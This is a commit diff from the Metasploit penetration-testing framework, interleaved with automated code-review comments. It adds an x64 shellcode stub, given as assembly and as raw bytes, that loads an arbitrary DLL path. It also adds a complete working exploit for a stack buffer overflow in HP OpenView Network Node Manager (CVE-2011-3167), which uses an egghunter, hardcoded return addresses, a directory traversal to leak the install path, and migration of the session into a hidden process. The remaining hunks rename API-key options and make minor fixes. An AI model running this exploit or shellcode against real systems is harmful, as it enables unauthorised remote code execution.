Merge branch 'master' of r7.github.com:rapid7/metasploit-framework
This commit is contained in:
commit
3fe5b7b09d
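--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,24 @@
+;-----------------------------------------------------------------------------;
+; Author: scriptjunkie (scriptjunkie[at]scriptjunkie[dot]us),
+; Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2003
+; 17 Jan 2012
+;-----------------------------------------------------------------------------;
+
+[BITS 64]
+[ORG 0]
+
+cld ; Clear the direction flag.
+and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
+call start ; Call start, this pushes the address of 'api_call' onto the stack.
+delta: ;
+%include "./src/block/block_api.asm" ;
+start: ;
+pop rbp ; Pop off the address of 'api_call' for calling later.
+lea rcx, [ebp+libpath-delta]
+mov r10d, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
+call rbp ; LoadLibraryA( &libpath );
+; Finish up with the EXITFUNK.
+%include "./src/block/block_exitfunk.asm"
+libpath:
+;db "funkystuff.dll", 0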
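Review bot: `lea rcx, [ebp+libpath-delta]` names the 32-bit `ebp` inside a `[BITS 64]` block, although the preceding `pop rbp` loads the full 64-bit register; the assembler honours the request with a 0x67 address-size prefix, which is visible as `\x5D\x67\x48\x8D\x8D\x00\x01\x00\x00` in the byte string of the new x64 LoadLibrary payload module later in this commit, so the address handed to LoadLibraryA is truncated to its low 32 bits whenever the stub is mapped above 4 GB. The line should read `lea rcx, [rbp+libpath-delta]`, and the assembled bytes in the payload file regenerated from it. The same defect therefore applies to that payload hunk; this note covers both.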
@ -690,6 +690,8 @@ class Module
if not match and self.respond_to?(:targets) and self.targets
match = [t,w] if self.targets.map{|x| x.name}.any? { |t| t =~ r }
end
when 'port'
match = [t,w] if self.datastore['RPORT'].to_s =~ r
when 'type'
match = [t,w] if (w == "exploit" and is_exploit)
match = [t,w] if (w == "auxiliary" and is_auxiliary)
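Review bot: The `when 'type'` branch only recognises `exploit` and `auxiliary`, while the help text added in the later `class Core` hunk advertises `type` as "exploit, auxiliary, or post", so a `type:post` search silently matches nothing; the two `match = [t,w] if (w == ...)` lines appear to be the additions here. Either add a third case for post modules mirroring those two lines (if the module class exposes a post predicate alongside `is_exploit`/`is_auxiliary`), or compare the module's type string directly so all three advertised values work. These lines also test `w ==` rather than the regex `r` that every other keyword uses, so partial terms such as `type:exp` behave differently from the rest of the search. Separately, the context line `.any? { |t| t =~ r }` reuses `t` as a block parameter while `[t,w]` relies on the outer `t`; on Ruby 1.8 that block parameter assigns to the outer local, so renaming it, `.any? { |name| name =~ r }`, avoids a wrong `match` value there.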
@ -1285,6 +1285,7 @@ class Core
"name" => "Modules with a matching descriptive name",
"path" => "Modules with a matching path or reference name",
"platform" => "Modules affecting this platform",
"port" => "Modules with a matching remote port",
"type" => "Modules of a specific type (exploit, auxiliary, or post)",
"app" => "Modules that are client or server attacks",
"author" => "Modules written by this author",
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
OptString.new('YEAR', [ false, "Limit results to a specific year", ""]),
OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
OptString.new('API_KEY', [ false, "Use this API key when getting the data", ""]),
OptString.new('CORPWATCH_APIKEY', [ false, "Use this API key when getting the data", ""]),
], self.class)
deregister_options('RHOST', 'RPORT', 'Proxies', 'VHOST')
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
{
'company_name' => datastore['COMPANY_NAME'],
'limit' => datastore['LIMIT'],
'key' => datastore['API_KEY']
'key' => datastore['CORPWATCH_APIKEY']
}
}, 25)
@ -45,7 +45,7 @@ class Metasploit4 < Msf::Auxiliary
register_options(
[
OptString.new('APIKEY', [true, "The SHODAN API key"]),
OptString.new('SHODAN_APIKEY', [true, "The SHODAN API key"]),
OptString.new('QUERY', [true, "Keywords you want to search for"]),
OptString.new('OUTFILE', [false, "A filename to store the list of IPs"]),
OptBool.new('DATABASE', [false, "Add search results to the database", false]),
@ -89,7 +89,7 @@ class Metasploit4 < Msf::Auxiliary
def run
# create our Shodan request parameters
query = datastore['QUERY']
apikey = datastore['APIKEY']
apikey = datastore['SHODAN_APIKEY']
@res = Net::DNS::Resolver.new()
dns_query = @res.query("#{datastore['VHOST']}", "A")
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
# OptAddressRange.new('RHOSTS', [false, "The target address, range, or CIDR identifier"]),
OptString.new('APIKEY', [ true, "Your HTTP:BL api key"])
OptString.new('HTTPBL_APIKEY', [ true, "Your HTTP:BL api key"])
], self.class)
end
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
def resolve(ip)
results = ''
apikey = datastore['apikey']
apikey = datastore['HTTPBL_APIKEY']
query = apikey + '.' + ip.split('.').reverse.join('.') + '.dnsbl.httpbl.org'
begin
results = Resolv::DNS.new.getaddress(query).to_s
@ -83,17 +83,17 @@ class Metasploit3 < Msf::Auxiliary
unless tmp_tblnames.nil?
tmp_db['DBName']= dbname[0]
tmp_db['Tables'] = []
tmp_tblnames.each do |tblname|
tmp_tblnames.each do |tblname|
next if tblname[0].nil?
tmp_tbl = {}
tmp_tbl['TableName'] = tblname[0]
tmp_tbl['TableName'] = tblname[0]
tmp_tbl['Columns'] = []
tmp_columns = get_columns(dbname[0], tblname[1])
unless tmp_columns.nil?
tmp_columns.each do |column|
next if column[0].nil?
next if column[0].nil?
tmp_column = {}
tmp_column['ColumnName'] = column[0]
tmp_column['ColumnName'] = column[0]
tmp_column['ColumnType'] = column[1]
tmp_column['ColumnLength'] = column[2]
tmp_tbl['Columns'] << tmp_column
@ -121,6 +121,7 @@ class Metasploit3 < Msf::Auxiliary
return results
end
# TODO: This should be split up, I fear nil problems in these query/response parsings
def get_columns(db_name, table_id)
results = mssql_query("Select syscolumns.name,systypes.name,syscolumns.length from #{db_name}..syscolumns JOIN #{db_name}..systypes ON syscolumns.xtype=systypes.xtype WHERE syscolumns.id=#{table_id}")[:rows]
return results
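Review bot: `get_columns` indexes the result of `mssql_query(...)` with `[:rows]` without a guard, so if the helper returns nil the method raises NoMethodError; the new TODO comment (which appears to be the one added line here) records that fear rather than preventing it. A minimal guard is `res = mssql_query(...)` / `return nil if res.nil?` / `res[:rows]`, which the caller's existing `unless tmp_columns.nil?` check already expects. Whether `mssql_query` can actually return nil is inferred from the author's own note, so confirm against the mixin. The names interpolated into the query come back from the server's own catalogue rather than the user, but an unquoted `db_name` containing spaces or a reserved word still breaks the statement; T-SQL identifier quoting, `[#{db_name}]..syscolumns`, avoids that.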
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'MYSQL Schema Dump',
'Version' => '$Revision$',
'Description' => %Q{
This module extracts the schema information from a
This module extracts the schema information from a
MySQL DB server.
},
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary
unless tmp_clmnames.nil? or tmp_clmnames.empty?
tmp_clmnames.each do |column|
tmp_column = {}
tmp_column['ColumnName'] = column[0]
tmp_column['ColumnName'] = column[0]
tmp_column['ColumnType'] = column[1]
tmp_tbl['Columns'] << tmp_column
end
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Postgres Schema Dump',
'Version' => '$Revision$',
'Description' => %Q{
This module extracts the schema information from a
This module extracts the schema information from a
Postgres server.
},
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
@ -117,7 +117,6 @@ class Metasploit3 < Msf::Auxiliary
when :complete
return res[:complete].rows
end
end
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
'Description' => %q{
This module exploits an use after free vulnerability in Mozilla
This module exploits a use-after-free vulnerability in Mozilla
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
becomes a dangling pointer and can be reused when setting the OBJECTs
@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'Felipe Andres Manzano', #Original poc (@feliam)
'sinn3r',
'juan vazquez',
'jduck'
@ -40,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa11-04.html' ],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/' ],
[ 'URL', 'http://blog.9bplus.com/analyzing-cve-2011-2462' ],
[ 'URL', 'https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0'], #Original PoC
[ 'URL', 'http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html' ]
],
'DefaultOptions' =>
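--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,277 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+
+HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ }
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::Remote::Egghunter
+
+def initialize(info={})
+super(update_info(info,
+'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow',
+'Description' => %q{
+This module exploits a stack buffer overflow in HP OpenView Network Node
+Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long
+'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can
+cause a stack-based buffer overflow and execute arbitrary code.
+
+The vulnerable code is within the "_OVBuildPath" function within "ov.dll". There
+are no stack cookies, so exploitation is achieved by overwriting the saved return
+address.
+
+The vulnerability is due to the use of the function "_OVConcatPath" which finally
+uses "strcat" in a insecure way. User controlled data is concatenated to a string
+which contains the OpenView installation path.
+
+To achieve reliable exploitation a directory traversal in OpenView5.exe
+(OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation
+path. If the installation path cannot be guessed the default installation path
+is used.
+} ,
+'Author' =>
+[
+'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
+'juan vazquez', # Metasploit module
+'sinn3r' # Metasploit fu
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'CVE', '2011-3167' ],
+[ 'OSVDB', '76775' ],
+[ 'BID', '50471' ],
+[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ],
+[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ]
+],
+'Payload' =>
+{
+'Space' => 950,
+'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0b..0x23)].pack("C*") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack("C*"),
+'DisableNops' => true,
+'EncoderOptions' =>
+{
+'BufferRegister' => 'EDI' # Egghunter jmp edi
+}
+},
+'Platform' => 'win',
+'Targets' =>
+[
+[ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3',
+# Patches installed:
+# * ECS_00048
+# * NNM_01128
+# * NNM_01172
+# * NNM_01187
+{
+'Offset' => 1067,
+'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002)
+'JmpESP' => 0x5a4251c5, # call esp - in ov.dll
+'EggAdjust' => 4,
+'ReadableAddress' => 0x5a466930 # ov.dll
+}
+]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Nov 01 2011'))
+
+register_options(
+[
+Opt::RPORT(80),
+], self.class)
+end
+
+# The following code allows to migrate if having into account
+# that over Windows XP permissions aren't granted on %windir%\system32
+#
+# Code ripped from "modules/post/windows/manage/migrate.rb". See it
+# for more information
+def on_new_session(client)
+
+if client.type != "meterpreter"
+print_error("NOTE: you must use a meterpreter payload in order to process migration.")
+return
+end
+
+client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+
+# Select path and executable to run depending the architecture
+# and the operating system
+if client.sys.config.sysinfo["OS"] =~ /Windows XP/
+windir = client.fs.file.expand_path("%ProgramFiles%")
+cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
+else # Windows 2000
+windir = client.fs.file.expand_path("%windir%")
+if client.sys.config.sysinfo['Architecture'] =~ /x86/
+cmd = "#{windir}\\System32\\notepad.exe"
+else
+cmd = "#{windir}\\Sysnative\\notepad.exe"
+end
+end
+
+# run hidden
+print_status("Spawning #{cmd.split("\\").last} process to migrate to")
+proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
+target_pid = proc.pid
+
+begin
+print_good("Migrating to #{target_pid}")
+client.core.migrate(target_pid)
+print_good("Successfully migrated to process #{target_pid}")
+rescue ::Exception => e
+print_error("Could not migrate in to process.")
+print_error(e.to_s)
+end
+
+end
+
+# Tries to guess the HP OpenView install dir via the Directory traversal identified
+# by OSVDB 44359.
+# If OSVDB 44359 doesn't allow to retrieve the installation path the default one
+# (C:\Program Files\HP OpenView\) is used.
+# Directory Traversal used:
+# http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log
+def get_install_path
+
+cgi = '/OvCgi/OpenView5.exe'
+web_session = rand_text_numeric(3)
+my_cookie = "OvOSLocale=English_United States.1252; "
+my_cookie << "OvAcceptLang=en-US; "
+my_cookie << "OvJavaLocale=en_US.Cp1252; "
+my_cookie << "OvWebSession=#{web_session}:AnyUser:"
+
+payload = "../../../log/setup.log"
+res = send_request_cgi({
+'uri' => cgi,
+'cookie' => my_cookie,
+'method' => "GET",
+'vars_get' =>
+{
+'Target' => "Main",
+'Scope' => "Snmp",
+'Action' => payload
+}
+}, 5)
+
+installation_path = ""
+if res and res.code == 200 and
+res.body =~ /([A-Z]:\\.*\\)log/
+print_status("Installation Path Found in #{$1}")
+installation_path = $1
+else
+print_status("Installation Path Not Found using the default")
+installation_path = "C:\\Program Files\\HP OpenView\\"
+end
+
+return installation_path
+end
+
+def exploit
+print_status("Trying target #{target.name}...")
+
+install_path = get_install_path
+install_path << "help\\English_United States.1252"
+
+eggoptions = {
+:checksum => true,
+}
+hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
+
+[ 'x86/alpha_mixed'].each { |name|
+enc = framework.encoders.create(name)
+if name =~/alpha/
+# If control is transferred to the decoder via "call esp" BufferOfset
+# shoulds be adjusted.
+if target["EggAdjust"] and target["EggAdjust"] > 0
+enc_options = {
+'BufferRegister' => 'ESP',
+'BufferOffset' => target["EggAdjust"]
+}
+enc.datastore.import_options_from_hash(enc_options)
+else
+enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
+end
+end
+hunter = enc.encode(hunter, nil, nil, platform)
+}
+
+offset = target['Offset'] - install_path.length - egg.length
+
+my_payload = egg
+my_payload << rand_text_alphanumeric(offset)
+my_payload << [target.ret].pack("V")
+my_payload << rand_text_alphanumeric(4) # Padding
+my_payload << [target["ReadableAddress"]].pack("V")
+my_payload << [target["JmpESP"]].pack("V")
+my_payload << hunter
+
+buf = "-textFile+#{my_payload}+++++++++++++++++++++++"
+buf << "-appendSelectList+-appendSelectListToTitle+%09%09++++++"
+buf << "-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++"
+buf << "-dataLine+2+"
+buf << "-commandTitle+%22Services%22+%09%09++++++"
+buf << "-iconName+%22Services%22+++++++++++++++++++++++"
+buf << "-cmd+rnetstat+"
+buf << "-S"
+
+web_session = rand_text_numeric(3)
+my_cookie = "OvOSLocale=English_United States.1252; "
+my_cookie << "OvAcceptLang=en-US; "
+my_cookie << "OvJavaLocale=en_US.Cp1252; "
+my_cookie << "OvWebSession=#{web_session}:AnyUser:"
+
+cgi = '/OvCgi/webappmon.exe'
+
+res = send_request_cgi({
+'uri' => cgi,
+'cookie' => my_cookie,
+'method' => "POST",
+'vars_post' =>
+{
+'ins' => 'nowait',
+'sel' => rand_text_alphanumeric(15),
+'app' => 'IP Tables',
+'act' => 'Services',
+'help' => '',
+'cache' => rand_text_numeric(4)
+},
+'data' => "arg=#{buf}" # Avoid uri encoding
+}, 3)
+
+if res and res.code != 502
+print_error("Eek! We weren't expecting a response, but we got one")
+if datastore['DEBUG']
+print_line()
+print_error(res.inspect)
+end
+end
+
+handler
+
+end
+
+end
+
+=begin
+
+* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3
+
+meterpreter > run post/windows/manage/migrate
+
+[*] Running module against HOME-F006222D6C
+[*] Current server process: webappmon.exe (7064)
+[*] Spawning notepad.exe process to migrate to
+[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
+[-] Call stack:
+[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'
+[-] (eval):80:in `create_temp_proc'
+[-] (eval):49:in `run'
+=end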
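Review bot: `rescue ::Exception => e` in `on_new_session` also catches Interrupt, SystemExit and NoMemoryError, so a user aborting during the migrate step sees "Could not migrate in to process." instead of the abort taking effect; `rescue ::StandardError => e` keeps the intended best-effort behaviour without hiding those (the Rex request error shown in the trailing `=begin` transcript would still be caught provided it derives from StandardError, which is worth confirming). In `get_install_path` the capture is read back through `$1` both in the status message and in the assignment; taking it once right after the `=~` line, `found = Regexp.last_match(1)`, and using `found` in both places avoids the cryptic global and reads more clearly. The `windir` local in `on_new_session` holds `%ProgramFiles%` on the XP branch and `%windir%` on the other, so a neutral name such as `base_dir` would describe both.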
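--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,74 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+module Metasploit3
+
+include Msf::Payload::Windows
+include Msf::Payload::Single
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Windows x64 LoadLibrary Path',
+'Version' => '$Revision$',
+'Description' => 'Load an arbitrary x64 library path',
+'Author' => [ 'scriptjunkie', 'sf' ],
+'License' => MSF_LICENSE,
+'Platform' => 'win',
+'Arch' => ARCH_X86_64,
+'PayloadCompat' =>
+{
+'Convention' => '-http -https',
+},
+'Payload' =>
+{
+'Offsets' =>
+{
+'EXITFUNC' => [ 228, 'V' ]
+},
+'Payload' =>
+"\xFC\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
+"\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
+"\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
+"\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
+"\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78" +
+"\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67" +
+"\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56" +
+"\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0" +
+"\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24" +
+"\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41" +
+"\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01" +
+"\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83" +
+"\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF" +
+"\xFF\xFF\x5D\x67\x48\x8D\x8D\x00\x01\x00\x00\x41\xBA\x4C\x77\x26" +
+"\x07\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF\xD5" +
+"\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13" +
+"\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5"
+}
+))
+register_options(
+[
+OptString.new('DLL', [ true, "The library path to load (UNC is OK)" ]),
+], self.class )
+end
+
+def generate
+return super + dll_string + "\x00"
+end
+
+def dll_string
+return datastore['DLL'] || ''
+end
+
+end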
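Review bot: `generate` and `dll_string` carry no documentation, and `dll_string` falls back to `''` although the DLL option is registered as required, so a missing value produces a stub that terminates the string immediately instead of a clear error; since `register_options` already enforces the option, the fallback only masks a misconfiguration and could be dropped. A comment above `generate` such as `# The stub ends at its libpath label; the NUL-terminated DLL path appended here is the string LoadLibraryA receives` would tie this method to the assembly source added earlier in this commit. The assembled bytes here also embed the `\x67` address-size prefix noted on that assembly hunk, so they need regenerating once the source is corrected.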
@ -15,12 +15,12 @@ class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report
include Msf::Post::File
include Msf::Post::Windows::Registry
def initialize(info={})
super( update_info( info,
'Name' => 'Windows File and Registry Artifacts Enumeration',
'Description' => %q{
This module will check the file system and registry for particular artifacts. The
This module will check the file system and registry for particular artifacts. The
list of artifacts is read from data/post/artifacts or a user specified file. Any
matches are written to the loot. },
'License' => MSF_LICENSE,
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Post
# Start enumerating
print_status("Processing artifacts file...")
file = ::File.open(filename, "r")
file = ::File.open(filename, "rb")
file.each_line do |line|
line.strip!
next if line.length < 1
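Review bot: `file = ::File.open(filename, "rb")` is never closed within this hunk; unless a `file.close` follows further down, the handle stays open until garbage collection. The block form closes it deterministically, `::File.open(filename, "rb") { |file| file.each_line do |line| ... end }`, or `::File.foreach(filename) do |line|` if `file` is not used elsewhere. Opening in binary mode also tags each `line` as ASCII-8BIT on Ruby 1.9, which raises Encoding::CompatibilityError if a non-ASCII artifact name is later interpolated into or concatenated with a UTF-8 string, so check how the stripped lines are consumed. The enclosing method continues past this hunk.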
@ -103,4 +103,4 @@ end
=begin
To-do: Use CSV or yaml format to store enum_artifacts_list.txt
=end
=end